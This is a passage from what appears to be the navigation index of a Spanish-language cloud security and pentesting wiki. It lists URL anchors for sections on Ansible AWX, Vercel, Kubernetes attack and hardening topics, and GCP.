entesting-ci-cd/ansible-tower-awx-automation-controller-security.html#información-básica","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#diferencias","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#stack-tecnológico","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#componentes-lógicos","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#flujo-de-ejecución-de-trabajos","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#creación-de-laboratorio-awx-para-pruebas","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#rbac","pentesting-ci-cd/ansible-tower-awx-automation-controller-security.html#roles-soportados","pentesting-ci-cd/vercel-security.html#vercel","pentesting-ci-cd/vercel-security.html#información-básica","pentesting-ci-cd/vercel-security.html#configuraciones-del-proyecto","pentesting-ci-cd/vercel-security.html#general","pentesting-ci-cd/vercel-security.html#dominios","pentesting-ci-cd/vercel-security.html#entornos","pentesting-ci-cd/vercel-security.html#variables-de-entorno","pentesting-ci-cd/vercel-security.html#git","pentesting-ci-cd/vercel-security.html#integraciones","pentesting-ci-cd/vercel-security.html#protección-de-implementación","pentesting-ci-cd/vercel-security.html#funciones","pentesting-ci-cd/vercel-security.html#caché-de-datos","pentesting-ci-cd/vercel-security.html#trabajos-cron","pentesting-ci-cd/vercel-security.html#drenajes-de-registro","pentesting-ci-cd/vercel-security.html#seguridad","pentesting-ci-cd/vercel-security.html#avanzado","pentesting-ci-cd/vercel-security.html#cortafuegos-del-proyecto","pentesting-ci-cd/vercel-security.html#cortafuegos","pentesting-ci-cd/vercel-security.html#reglas-personalizadas-y-bloqueo-de-ip","pentesting-ci-cd/vercel-security.html#implementación-del-proyecto","pentesting-ci-cd/vercel-security.html#fuente","pentesting-ci-cd/vercel-security.html#protección-contra-desviaciones","pentesting-ci-cd/vercel-security.html#configuraciones-del-equipo","pentesting-ci-cd/vercel-security.html#general-1","pentesting-ci-cd/vercel-security.html#facturación","pentesting-ci-cd/vercel-security.html#miembros","pentesting-ci-cd/vercel-security.html#grupos-de-acceso","pentesting-ci-cd/vercel-security.html#drenajes-de-registro-1","pentesting-ci-cd/vercel-security.html#seguridad-y-privacidad","pentesting-ci-cd/vercel-security.html#cómputo-seguro","pentesting-ci-cd/vercel-security.html#variables-de-entorno-1","pentesting-ci-cd/todo.html#todo","pentesting-cloud/pentesting-cloud-methodology.html#metodología-de-pentesting-en-la-nube","pentesting-cloud/pentesting-cloud-methodology.html#metodología-básica","pentesting-cloud/pentesting-cloud-methodology.html#herramientas-multi-nube","pentesting-cloud/pentesting-cloud-methodology.html#purplepanda","pentesting-cloud/pentesting-cloud-methodology.html#prowler","pentesting-cloud/pentesting-cloud-methodology.html#cloudsploit","pentesting-cloud/pentesting-cloud-methodology.html#scoutsuite","pentesting-cloud/pentesting-cloud-methodology.html#steampipe","pentesting-cloud/pentesting-cloud-methodology.html#cs-suite","pentesting-cloud/pentesting-cloud-methodology.html#nessus","pentesting-cloud/pentesting-cloud-methodology.html#cloudlist","pentesting-cloud/pentesting-cloud-methodology.html#cartography","pentesting-cloud/pentesting-cloud-methodology.html#starbase","pentesting-cloud/pentesting-cloud-methodology.html#skyark","pentesting-cloud/pentesting-cloud-methodology.html#cloud-brute","pentesting-cloud/pentesting-cloud-methodology.html#cloudfox","pentesting-cloud/pentesting-cloud-methodology.html#más-listas-de-herramientas-de-seguridad-en-la-nube","pentesting-cloud/pentesting-cloud-methodology.html#google","pentesting-cloud/pentesting-cloud-methodology.html#gcp","pentesting-cloud/pentesting-cloud-methodology.html#workspace","pentesting-cloud/pentesting-cloud-methodology.html#aws","pentesting-cloud/pentesting-cloud-methodology.html#azure","pentesting-cloud/pentesting-cloud-methodology.html#attack-graph","pentesting-cloud/pentesting-cloud-methodology.html#office365","pentesting-cloud/kubernetes-security/index.html#pentesting-de-kubernetes","pentesting-cloud/kubernetes-security/index.html#fundamentos-de-kubernetes","pentesting-cloud/kubernetes-security/index.html#laboratorios-para-practicar-y-aprender","pentesting-cloud/kubernetes-security/index.html#fortalecimiento-de-kubernetes--herramientas-automáticas","pentesting-cloud/kubernetes-security/index.html#pentest-manual-de-kubernetes","pentesting-cloud/kubernetes-security/index.html#desde-el-exterior","pentesting-cloud/kubernetes-security/index.html#enumeración-dentro-de-un-pod","pentesting-cloud/kubernetes-security/index.html#enumerando-kubernetes-con-credenciales","pentesting-cloud/kubernetes-security/index.html#escalación-de-privilegios-a-un-namespace-diferente","pentesting-cloud/kubernetes-security/index.html#de-kubernetes-a-la-nube","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubernetes-basics","pentesting-cloud/kubernetes-security/kubernetes-basics.html#kubernetes-basics-1","pentesting-cloud/kubernetes-security/kubernetes-basics.html#arquitectura-y-conceptos-básicos","pentesting-cloud/kubernetes-security/kubernetes-basics.html#qué-hace-kubernetes","pentesting-cloud/kubernetes-security/kubernetes-basics.html#arquitectura","pentesting-cloud/kubernetes-security/kubernetes-basics.html#infraestructura-pki---autoridad-de-certificación-ca","pentesting-cloud/kubernetes-security/kubernetes-basics.html#acciones-básicas","pentesting-cloud/kubernetes-security/kubernetes-basics.html#minikube","pentesting-cloud/kubernetes-security/kubernetes-basics.html#fundamentos-de-kubectl","pentesting-cloud/kubernetes-security/kubernetes-basics.html#minikube-dashboard","pentesting-cloud/kubernetes-security/kubernetes-basics.html#ejemplos-de-archivos-de-configuración-yaml","pentesting-cloud/kubernetes-security/kubernetes-basics.html#namespaces","pentesting-cloud/kubernetes-security/kubernetes-basics.html#helm","pentesting-cloud/kubernetes-security/kubernetes-basics.html#secretos-de-kubernetes","pentesting-cloud/kubernetes-security/kubernetes-basics.html#secrets-en-etcd","pentesting-cloud/kubernetes-security/kubernetes-basics.html#referencias","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#pentesting-kubernetes-services","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#encontrar-pods-expuestos-con-osint","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#cómo-kubernetes-expone-servicios","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#encontrar-pods-expuestos-a-través-de-escaneo-de-puertos","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#nmap","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kube-apiserver","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#api-de-kubelet","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#api-de-etcd","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#tiller","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#cadvisor","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#nodeport","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#configuraciones-vulnerables","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#acceso-anónimo-a-kube-apiserver","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#verificando-el-acceso-anónimo-a-etcd","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#kubelet-rce","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#verificación-de-la-exposición-de-información-del-kubelet-puerto-solo-de-lectura","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/index.html#referencias","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#autenticación-y-autorización-de-kubelet","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#autenticación-de-kubelet","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#autorización-de-kubelet","pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.html#references","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#exponiendo-servicios-en-kubernetes","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#enumeración-automática","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#clusterip","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#nodeport","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#loadbalancer","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#ips-externos","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#externalname","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#ingress","pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.html#referencias","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#atacando-kubernetes-desde-dentro-de-un-pod","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#escape-del-pod","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#escapando-del-pod","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#abusando-de-los-privilegios-de-kubernetes","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#abusando-de-los-privilegios-en-la-nube","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#buscar-servicios-de-red-vulnerables","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#servicios","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#escaneo","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#sniffing","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#suplantación-de-red","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#dos-en-nodo","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#node-post-exploitation","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#find-node-kubeconfig","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#robar-secretos","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#privileged-daemonsets","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#pivot-to-cloud","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#steal-etcd","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#persistencia-de-pods-estáticosmirrored","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#eliminar-pods--nodos-no-programables","pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html#herramientas-automáticas","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#enumeración-de-kubernetes","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#tokens-de-kubernetes","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#tokens-de-cuenta-de-servicio","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#pods-calientes","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#rbac","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#aplicaciones-gui","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#hoja-de-trucos-de-enumeración","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#diferencias-entre-los-verbos-list-y-get","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#usando-curl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#usando-kubectl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#configuración-actual","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-recursos-soportados","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-privilegios-actuales","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-roles-de-otros","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-namespaces","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-secretos","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-cuentas-de-servicio","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-despliegues","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-pods","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-servicios","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-nodos","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-daemonsets","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-cronjob","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-configmap","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-políticas-de-red--políticas-de-red-de-cilium","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-todo--todo","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-todos-los-recursos-gestionados-por-helm","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#obtener-consumos-de-pods","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#interactuando-con-el-clúster-sin-usar-kubectl","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#escapando-del-pod","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#creando-un-pod-privilegiado","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#eliminar-un-pod","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#crear-una-cuenta-de-servicio","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#eliminar-una-cuenta-de-servicio","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#crear-un-rol","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#eliminar-un-rol","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#crear-un-role-binding","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#eliminar-un-role-binding","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#eliminar-un-secreto","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#eliminar-un-secreto-1","pentesting-cloud/kubernetes-security/kubernetes-enumeration.html#referencias","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#control-de-acceso-basado-en-roles-de-kubernetes-rbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#control-de-acceso-basado-en-roles-rbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#plantillas","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#verbos-de-reglas","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#ejemplos","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#rolebinding-y-clusterrolebinding","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#enumerando-rbac","pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.html#abuso-de-rolesclusterroles-para-escalación-de-privilegios","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#abusing-rolesclusterroles-in-kubernetes","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#escalación-de-privilegios","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#acceso-a-cualquier-recurso-o-verbo-wildcard","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#acceder-a-cualquier-recurso-con-un-verbo-específico","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pod-create---steal-token","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#creación-y-escape-de-pod","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#crear-pod---mover-a-la-nube","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#crearpatch-deployment-daemonsets-statefulsets-replicationcontrollers-replicasets-jobs-y-cronjobs","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#pods-exec","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#port-forward","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#hosts-writable-varlog-escape","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#suplantación-de-cuentas-privilegiadas","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#listando-secretos","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#creación-y-lectura-de-secretos","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#lectura-de-un-secreto--fuerza-bruta-de-ids-de-token","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#solicitudes-de-firma-de-certificados","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#aws-eks-aws-auth-configmaps","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#escalando-en-gke","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#crear-token-de-serviceaccounts","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#ephemeralcontainers","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#validatingwebhookconfigurations-o-mutatingwebhookconfigurations","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#escalar","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#proxy-de-nodos","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#eliminar-pods--nodos-no-programables","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#estado-de-los-servicios-cve-2020-8554","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#estado-de-nodos-y-pods","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#prevención-de-escalación-de-privilegios-incorporada","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#obtener-y-parchear-rolebindingsclusterrolebindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#otros-ataques","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#aplicación-proxy-sidecar","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#controlador-de-admisión-malicioso","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#opa-gatekeeper-bypass","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#mejores-prácticas","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#deshabilitar-el-automontaje-de-tokens-de-cuentas-de-servicio","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#asignación-restrictiva-de-usuarios-en-rolebindingsclusterrolebindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#roles-específicos-de-namespace-sobre-roles-de-clúster","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#utilizar-herramientas-automatizadas","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#referencias","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.html#pod-escape-privileges","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.html#privilegios-y-hostpid","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#laboratorio-de-abuso-de-roles-en-kubernetes","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#creación-de-pod---escalar-a-sas-de-ns","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#crear-daemonset","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#patch-daemonset","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#no-funciona","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#crearpatch-bindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#bind-explícitamente-bindings","pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.html#creación-de-roles-arbitrarios","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#escalación-de-namespace-en-kubernetes","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#abusar-de-privilegios-de-k8s","pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.html#escapar-al-nodo","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#external-secret-operator","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#descargo-de-responsabilidad","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#requisitos-previos","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#reuniendo-información-sobre-el-clustersecretstore-existente","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#enumeración-de-externalsecret","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#reuniendo-las-piezas","pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.html#referencias","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#kubernetes-pivoting-to-clouds","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#gcp","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#montando-claves-de-gcp-sa-como-secreto","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#relacionando-json-de-gsa-a-secreto-de-ksa","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#identidad-de-carga-de-trabajo-de-gke","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#aws","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#kiam--kube2iam-rol-iam-para-pods","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#iam-role-para-cuentas-de-servicio-k8s-a-través-de-oidc","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#encontrar-pods-y-cuentas-de-servicio-con-roles-de-iam-en-el-clúster","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#node-iam-role","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#robar-el-token-del-rol-iam","pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.html#referencias","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#kubernetes-network-attacks","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#introducción","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#redes-básicas-de-kubernetes","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#arp","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#dns","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#suplantación-arp-en-pods-en-el-mismo-nodo","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#scapy","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#arpspoof","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#dns-spoofing","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#capturando-tráfico","pentesting-cloud/kubernetes-security/kubernetes-network-attacks.html#referencias","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#endurecimiento-de-kubernetes","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#herramientas-para-analizar-un-clúster","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubescape","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-bench","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubeaudit","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-hunter","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubei","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubiscan","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#managed-kubernetes-auditing-toolkit","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#auditar-código-iac","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#popeye","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kics","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#checkov","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kube-score","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#consejos","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#kubernetes-podsecuritycontext-y-securitycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#endurecimiento-de-la-api-de-kubernetes","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#endurecimiento-de-securitycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/index.html#endurecimiento-general","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#kubernetes-securitycontexts","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#podsecuritycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#securitycontext","pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.html#referencias","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#kubernetes---opa-gatekeeper","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#definición","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#aplicar-restricción","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/index.html#referencias","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#kubernetes-opa-gatekeeper-bypass","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#abusando-de-la-mala-configuración","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#enumerar-reglas","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#espacios-de-nombres-excluidos","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#bypass","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#abusando-de-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.html#referencias","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#kubernetes-kyverno","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#definición","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#casos-de-uso","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#ejemplo-clusterpolicy-y-policy","pentesting-cloud/kubernetes-security/kubernetes-kyverno/index.html#referencias","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#kubernetes-kyverno-bypass","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#abusando-de-la-mala-configuración-de-políticas","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#enumerar-reglas","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#enumerar-excluidos","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#ejemplo","pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.html#abusando-de-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#kubernetes-validatingwebhookconfiguration","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#definición","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#propósito","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#enumeración","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#abusando-de-kyverno-y-gatekeeper-vwc","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#caso-de-uso","pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.html#referencias","pentesting-cloud/gcp-security/index.html#gcp-pentesting","pentesting-cloud/gcp-security/index.html#información-básica","pentesting-cloud/gcp-security/index.html#laboratorios-para-aprender","pentesting-cloud/gcp-security/index.html#metodología-de-pentesterred-team-en-gcp","pentesting-cloud/gcp-security/index.html#enumeración-básica","pentesting-cloud/gcp-security/index.html#ssrf","pentesting-cloud/gcp-security/index.html#whoami","pentesting-cloud/gcp-security/index.html#enumeración-de-org","pentesting-cloud/gcp-security/index.html#principios-y-enumeración-de-iam","pentesting-cloud/gcp-security/index.html#enumeración-de-servicios","pentesting-cloud/gcp-security/index.html#escalación-de-privilegios-post-explotación-y-persistencia","pentesting-cloud/gcp-security/index.html#servicios-expuestos-públicamente","pentesting-cloud/gcp-security/index.html#gcp--workspace-pivoting","pentesting-cloud/gcp-security/index.html#herramientas-automáticas","pentesting-cloud/gcp-security/index.html#gcloud-config--debug","pentesting-cloud/gcp-security/index.html#captura-de-gcloud-gsutil-red","pentesting-cloud/gcp-security/index.html#configuración-del-token-oauth-en-gcloud","pentesting-cloud/gcp-security/index.html#referencias","pentesting-cloud/gcp-security/gcp-basic-information/index.html#gcp---información-básica","pen